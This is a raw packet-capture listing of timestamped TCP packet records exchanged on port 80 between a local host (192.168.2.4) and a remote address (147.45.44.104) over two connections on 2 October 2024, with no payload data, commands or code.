Oct 2, 2024 09:41:16.418720007 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418737888 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418746948 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418746948 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418757915 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418776035 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418787956 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418787956 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418792963 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418812037 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418822050 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418822050 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418831110 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418850899 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418852091 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418852091 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418900967 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418900967 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419035912 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419053078 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419069052 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419085026 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419111967 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419120073 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419120073 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419130087 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419147968 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419157982 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419157982 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419164896 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419183016 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419195890 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419202089 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419202089 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419244051 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419244051 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419261932 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419279099 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419295073 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419311047 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419321060 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419336081 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419336081 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419339895 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419357061 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419373035 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419399023 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419406891 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419426918 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419434071 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419450998 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419456959 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419466972 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419477940 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419486046 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419498920 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419503927 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419522047 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419526100 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419526100 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419538975 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419550896 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419559002 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419570923 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419595003 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419612885 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419763088 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419779062 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419792891 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419809103 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419826984 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419836998 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419856071 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419872046 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419879913 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419888020 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419900894 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419905901 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419922113 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419923067 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419940948 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419936895 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419959068 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419965029 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419965029 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419975996 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.419986010 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.419994116 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420006990 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420011997 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420032024 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420032024 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420052052 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420069933 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420088053 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420593023 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420608997 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420624971 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420645952 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420664072 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420684099 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420701027 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420717955 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420726061 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420736074 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420747995 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420767069 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420780897 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420815945 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420833111 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420849085 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420866013 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420881033 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420897007 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420912981 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420923948 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420929909 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420948982 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.420952082 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420969009 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.420984983 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.421618938 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.421634912 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.421650887 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.421669006 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.421717882 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.421747923 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.425107002 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425360918 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425381899 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425399065 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425415993 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425432920 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425451994 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425471067 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425477982 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.425477982 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.425520897 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.425520897 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.425540924 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425560951 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425580025 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425622940 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425623894 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.425623894 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.425641060 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.425713062 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.425987959 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426004887 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426022053 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426064014 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426064014 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426098108 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426115036 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426131964 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426147938 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426163912 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426172972 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426172972 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426179886 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426206112 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426222086 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426222086 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426259041 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426259041 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426664114 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426681042 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426697969 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426737070 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426737070 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426757097 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426774025 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426789999 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426806927 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426827908 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426827908 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426861048 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426877975 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426892996 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426909924 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426925898 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426939011 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426939011 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426944017 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.426975965 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.426975965 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.427020073 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.427632093 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.427649021 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.427665949 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.427711964 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.427711964 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.427733898 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.427752972 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.427767992 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.427810907 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.427810907 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494016886 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494050026 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494067907 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494082928 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494101048 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494117022 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494132996 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494146109 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494148016 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494170904 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494200945 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494206905 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494219065 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494234085 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494246960 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494254112 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494277000 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494292974 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494303942 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494308949 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494326115 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494330883 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494347095 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494364023 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494370937 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494400978 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494618893 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494671106 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494688034 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494716883 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494735956 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494762897 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494779110 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494795084 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494822025 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494826078 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494838953 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494851112 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494857073 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.494889975 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.494923115 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495031118 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495080948 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495081902 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495098114 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495147943 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495255947 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495271921 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495297909 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495316029 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495332003 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495342970 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495349884 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495363951 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495368004 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495400906 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495414972 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495436907 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495464087 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495531082 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495558977 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495574951 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495630980 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495655060 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495670080 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495686054 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495702028 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495721102 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495738029 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495767117 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495781898 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495798111 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495814085 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495831013 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495846033 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.495878935 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.495878935 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.496105909 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.496146917 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.496162891 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.496201038 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.496251106 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.496265888 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.496283054 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.496306896 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.496313095 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.496330976 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.496349096 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.496351004 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.496387959 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.503315926 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503437042 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503453970 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503468990 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503485918 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503501892 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503518105 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503537893 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.503571033 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.503571033 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.503602982 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503631115 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503648996 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503693104 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.503693104 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.503906965 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503922939 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503940105 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.503957987 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504019022 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504019022 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504053116 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504070044 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504086971 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504103899 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504127026 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504127026 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504215002 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504297018 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504313946 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504329920 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504347086 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504370928 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504370928 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504416943 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504432917 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504447937 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504456997 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504456997 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504465103 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504482985 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504498959 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504508972 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504508972 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504514933 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504533052 CEST	80	49744	147.45.44.104	192.168.2.4
